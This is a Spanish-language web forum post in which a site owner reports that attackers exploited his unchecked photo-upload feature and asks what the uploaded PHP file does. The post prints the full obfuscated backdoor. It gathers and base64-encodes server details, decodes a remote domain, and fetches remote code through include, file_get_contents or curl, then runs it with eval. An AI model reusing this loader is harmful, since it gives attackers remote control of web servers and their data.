Ver Mensaje Individual
  #1 (permalink)  
Antiguo 12/11/2009, 21:49
Avatar de MoDoRrO
MoDoRrO
 
Fecha de Ingreso: septiembre-2005
Ubicación: Php+Flash+AS
Mensajes: 1.072
Antigüedad: 18 años, 8 meses
Puntos: 12
que significa este codigo php (codigo codificado) solo expertos

Hola amigos, siempre he creado mis aplicaciones de UPLOAD
con el error de no comprobar la extencion de este...

es por ello, que algunas personas malas

aprovecharon el "Sube tu Foto!" para subir un .php

Código PHP:
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="6eb96e259631ec3c51db602a9268d539"$f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
esto me encontre...

no me elimino (alrededor de 10mil fotos (incluyendo thumbs) ni otros archivos)

aunque no se si en realidad lo "ejecutaron"

en este momento desactive todos los uploads y estoy añadiendo la seguridad correspondiente.

pero... que significa el codigo que acabo de postear???

Gracias a todos

Última edición por MoDoRrO; 12/11/2009 a las 22:03 Razón: agregar informacion